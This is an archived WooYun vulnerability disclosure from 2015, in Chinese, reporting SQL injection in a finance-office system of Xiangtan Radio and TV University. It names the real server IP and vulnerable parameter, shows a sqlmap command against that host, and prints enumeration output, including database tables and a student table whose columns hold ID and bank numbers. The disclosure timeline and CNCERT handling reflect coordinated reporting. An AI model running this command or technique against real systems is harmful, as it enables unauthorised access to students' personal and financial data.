当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131205

漏洞标题:湘潭广播电视大学某财物系统存在sql注入

相关厂商:湘潭广播电视大学

漏洞作者: 路人甲

提交时间:2015-08-05 08:29

修复时间:2015-09-21 15:14

公开时间:2015-09-21 15:14

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

湘潭广播电视大学计财处存在sql注入,

详细说明:

http://222.243.162.35/Article/DetailsView.aspx?id=85


加引号'后报错:

111.png


放入sqlmap:sqlmap.py -u "http://222.243.162.35/Article/DetailsView.aspx?id=83"

222.png


漏洞证明:

21个库:

333.png


随便选一个库:xxcx

xxcx
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| dbo.T_SF_XSSFD_DETAIL | 151538  |
| dbo.View_xssfd_detail | 151538  |
| dbo.cj                | 127115  |
| dbo.T_SF_XSSFD        | 114873  |
| dbo.T_SF_STUDENT      | 30445   |
| dbo.View_sf_xsxx      | 30445   |
| dbo.V_zfl_kcbk        | 27634   |
| dbo.T_SF_CLASS        | 1293    |
| dbo.View_zyjs         | 107     |
| dbo.zyccorzymc        | 107     |
| dbo.yxkoryxkml        | 88      |
| dbo.Article           | 61      |
| dbo.mz                | 57      |
| dbo.xtrtu_zg_info     | 50      |
| dbo.jg                | 34      |
| dbo.MenuSmallClass    | 27      |
| dbo.T_SF_ENTRY        | 20      |
| dbo.zzmm              | 11      |
| dbo.dep_info          | 10      |
| dbo.prof_info         | 10      |
| dbo.zzzk              | 9       |
| dbo.photo             | 8       |
| dbo.MenuBigClass      | 7       |
| dbo.SmallClass        | 6       |
| dbo.yxlcc             | 6       |
| dbo.ZgSmallClass      | 6       |
| dbo.fbqk              | 5       |
| dbo.Recruit_Student   | 5       |
| dbo.View_zstable      | 5       |
| dbo.View_zstjtable    | 5       |
| dbo.zjlx              | 4       |
| dbo.BigClass          | 3       |
| dbo.xslb              | 3       |
| dbo.photo_info        | 2       |
| dbo.photo_info_s      | 2       |
| dbo.pop_info          | 2       |
| dbo.tb_User           | 2       |
| dbo.ZgBigClass        | 2       |
| dbo.zsrwgrtj          | 2       |
| dbo.guestbook         | 1       |
| dbo.site_config       | 1       |
+-----------------------+---------+


各种信息:

Database: xxcx
Table: T_SF_STUDENT
[37 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| ADDRESS          | varchar  |
| BANK_NO          | varchar  |
| BIRTH_DATE       | char     |
| CLASS            | varchar  |
| CLASS1           | varchar  |
| CLASS_TAG        | char     |
| CREATE_DATE      | datetime |
| CREATOR          | varchar  |
| DEPT             | varchar  |
| DORM_HOUSE       | varchar  |
| DORM_ROOM        | varchar  |
| EMAIL            | varchar  |
| IC_NO            | varchar  |
| ID               | varchar  |
| ID1              | varchar  |
| ID_NO            | varchar  |
| ID_TEMP          | varchar  |
| MODIFIER         | varchar  |
| MODIFY_DATE      | datetime |
| MODIFY_TRACE     | varchar  |
| NAME             | varchar  |
| PERIOD_BEGIN     | varchar  |
| PERIOD_END       | varchar  |
| PHONE            | varchar  |
| REMARK           | varchar  |
| SEX              | char     |
| SHORTNAME        | varchar  |
| SPECIALITY       | varchar  |
| SPECIALITY2      | varchar  |
| STATCODE1        | varchar  |
| STATCODE2        | varchar  |
| STATCODE3        | varchar  |
| STATUS           | char     |
| STUD_KIND        | varchar  |
| STUD_SOURCE      | varchar  |
| STUDY_STATUS     | varchar  |
| STUDY_STATUS_TAG | char     |
+------------------+----------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-07 15:12

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给赛尔网络,由其后续协调网站管理单位处置。

最新状态:

暂无